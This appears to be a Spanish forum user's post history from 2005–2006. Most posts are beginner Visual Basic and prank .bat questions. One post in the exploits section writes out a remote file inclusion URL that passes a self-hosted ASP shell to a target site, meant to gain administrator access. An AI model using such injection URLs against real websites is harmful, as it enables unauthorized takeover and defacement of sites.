elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Bugs y Exploits / Re: Mi Primer ASP Shell en: 3 Agosto 2006, 15:12 pm
Todo lo k sea defacears webs...son metodos RFI?? (sql, etc...)

Creo k esta pregunta podria llegar al grado de estupida...pero esk necesito aclarar esa idea  ;D
2  Seguridad Informática / Bugs y Exploits / Re: Mi Primer ASP Shell en: 2 Agosto 2006, 13:00 pm
eso del ftp....tp lo entiendo yo  :-[...como lo hago, me creo una cuenta ftp por ejemplo en "miarroba" y subo a "mi pagina web" ese codigo en .asp a traves de ftp o como sea no? la cuestion es tener subido en mi pagina ese codigo para poder usarlo, ahora pongo la direccion de mi pagina de forma k abra el .asp
"www.mipagina.com/codigo.asp" y asi se abriria el codigo en la shell no???

se supone k ese codigo es un xploit (corriganme por favor si me ekivoco) y k introduciendolo en otro codigo web pues me metere como administrador y podre hacer lo k kiera en la web, para hacer tal cosa tendria k poner:

www.paginaahacker.com/index.asp?pais=xxx&pagina=http://www.mipagina.com/codigo.asp

se supone k si sale bien y ese xploit es asi como se usa (k nose mucho de exploits...nose de k tipo es este ni nada   :P) me meteria directamente en la web como administrador???


3  Seguridad Informática / Hacking / Re: Combinaciones numericas en: 1 Octubre 2005, 00:26 am
Pero, pork kieres un generador de codigos de 8 caracteres ???, atakes por diccionario o algo  ;D?, nose...
ombre yo no soi ni mucho menos un experto ni nada pero...me gustaria saber para k lonecesitas xD,curiosidad...  ;D
4  Programación / Programación Visual Basic / Re: Contraseñas.... en: 29 Septiembre 2005, 00:03 am
OK gracias por la ayuda  ;)
pero ahora tengo otro problema  ;D
vereis vi ace poco en la web www.boinasnegras.com un nivel k era poner una contraseña pero k era así: <b>negrita</b>
keria acer lo mismo mas bien personalicado pero igual para bisual basic y puse esto:

Dim A As String
Dim B As String
Dim C As String
Private Sub Command1_Click()
A = Text1.Text
B = Label4
C = Label5
If A <> B Then
Label3 = "La contraseña es incorrecta"
If A = B Then
Label3 = "Lo visible y lo invisible"
If A = C Then
Label3 = "Enhorabuena, has pasado el nivel 2, el codigo de autentificación es 3210"
End If

End Sub


pero me sale error y me señala Private Sub Command1_Click()

tambien me sale una ventana emergente diciendo esto:
compile error:
Block If without End if

a k se debe esto??? ???
5  Programación / Programación Visual Basic / Contraseñas.... en: 28 Septiembre 2005, 00:17 am
salu2 peña

Ola a todos  :D,vereis,soi un principiante en esto de lenguajes de programacion, :(, pero algo se....(lo minimo,pero es algo no? ;D)
y haciendo "programas" k solo daban MsgBox me e decidio a acer otras cosas como programillas asi tipo chulos....vosotros me entendeis...
por ejemplo,keria krear un autentificador de contraseñas y puse esto en la linea de codigos:
Dim a, b As Integer
Private Sub Command1_Click()
a = Text1
b = Text2
If a = b Then Label3 = "Contraseña valida enhorabuena, no eres un cabezahueca"
If a <> b Then Label3 = "La contraseña no es correcta"
End Sub

pero me sale k esta mal,k tengo k cambiar Text2  ???, y claro lo k quiero acer simplemente es poner en text1 y text2 lo mismo es un programa "tonto" pero abrá kien se coma al coco averiguandolo,ejemplo de lo k puse en cada cosa

Text1 puse dentro La contraseña es incorrecta
Text2 lo dejé en blanco
asi para descubrirla tienes k copiar lo del texto1 y darle al boton validar,pero al poner eso de arriba me salen errores  ???

k puedo acer¿? gracias a to dios  ;D
6  Programación / Programación Visual Basic / Re: visual basic .exe el problema tonto en: 7 Septiembre 2005, 14:24 pm
OK,si alguien ve este tema y supiera el link,podrian ponerlo???? gracias
7  Programación / Programación Visual Basic / Re: visual basic .exe el problema tonto en: 6 Septiembre 2005, 23:20 pm
no,pero mi problema es k no sale make .exe ni nada,simplemente no sale nada referido al .exe osea,k agoooo????! ;D
8  Programación / Programación Visual Basic / visual basic .exe el problema tonto en: 6 Septiembre 2005, 22:54 pm
salu2 peña


vereis,tengo el visual basic 2005 express edition edition beta 2,pero el problema esta en cuanto intento hacer un .exe,vereis,yo me estoy iniciando por asi decirlo en vb y me gustaria crear un .exe con este al menos para empezar pero nose donde le tengo k dar para crearlo????,si pudieran aclarar mis dudas  ;)


gracias a to dios  ;D
9  Seguridad Informática / Hacking / Re: broma bat!!! en: 10 Agosto 2005, 16:47 pm
ola amiguitos del progresis


Vereis,nose en lo k me e ekivocao,e creao la broma .bat a partit del un texto,asin a sio como lo e echo:

e creado un texto y aki e metio lo k se mete en uno.bat lo e guardao como uno.bat en tipo todos los archivos y cuando se me crea el bat e borrao el texto k se me kea del principio,luego e creao el dos.bat poniendo dentro del texo lo que ponia en el dos.bat y e echo lo mismo,e borrao luego el texto k se me keaba,luego e creao un texto con esto es una broma dentro y lo e guardao tipo documento de texto(.txt) y lo e metio en la c:     
Bien,ahora abro el uno.bat y se me abre solo una ventana diciendo esto es una broma,solo una ventana.
Y si abro el dos.bat me sale el cmd pero sin el esto es una broma,me pueden decir en k me e ekivocado? ???



gracias a to dios  ;D
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines